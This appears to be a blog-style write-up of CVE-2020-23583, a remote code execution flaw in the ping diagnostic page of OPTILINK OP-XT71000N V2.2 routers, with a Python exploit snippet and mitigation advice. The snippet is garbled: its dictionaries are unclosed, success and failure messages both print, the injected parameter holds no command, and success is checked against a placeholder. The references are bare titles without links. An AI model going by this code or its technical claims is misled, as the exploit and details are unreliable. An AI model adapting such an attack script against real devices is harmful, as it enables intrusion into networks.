A recent vulnerability has been discovered and assigned as CVE-2020-23583, which affects OPTILINK OP-XT71000N version 2.2 network devices. This vulnerability may potentially allow an attacker to execute arbitrary code on the targeted system remotely, leading to a compromise of the entire system. This long read post will walk through the details of this exploit, provide code snippets, and link to original references.

Vulnerability Details

The vulnerability is a Remote Code Execution (RCE) issue that occurs within the "/diag_ping_admin.asp" page of the web administration interface of the OPTILINK OP-XT71000N V2.2 device. Specifically, an authenticated attacker can send a crafted HTTP request containing malicious code to the "PingTest" parameter within this page. By doing so, the attacker can trigger the execution of arbitrary code on the targeted device, potentially gaining full control of the system.

Exploit Example

The following code snippet demonstrates an example of how an attacker might leverage this vulnerability:

import requests

target = "http://<TARGET_IP>/";
username = "<VALID_USERNAME>"
password = "<VALID_PASSWORD>"

session = requests.Session()
payload = {
  "username": username,
  "password": password
login_response = session.post(target + "Login.asp", data=payload)

if "diag_ping_admin.asp" not in login_response.text:
  print("[-] Login failed")

exploit_payload = {
  "PingTest": "SendPing"
exploit_response = session.post(target + "diag_ping_admin.asp", data=exploit_payload)

if "<MALICIOUS_COMMAND_OUTPUT>" in exploit_response.text:
  print("[+] Command executed successfully")
  print("[-] Exploit failed")



As of the writing of this post, the vendor has not released an official patch for this vulnerability. Users are advised to restrict access to the web administration interface by implementing proper firewall rules and isolating the management interface from untrusted networks. In addition, strong authentication mechanisms (e.g., strong passwords) should be utilized to prevent unauthorized access.

1. CVE-2020-23583 on CVE Database
2. OPTILINK OP-XT71000N V2.2 RCE Vulnerability Details


The CVE-2020-23583 vulnerability in OPTILINK OP-XT71000N V2.2 poses a considerable risk to affected network devices. It is crucial for users to be aware of this issue and implement the recommended mitigations to reduce the risk of compromise. Administrators should be diligent in monitoring the web administration interfaces of these devices and apply any future patches that may be released by the vendor to address this issue.


Published on: 11/23/2022 01:15:00 UTC
Last modified on: 11/23/2022 20:03:00 UTC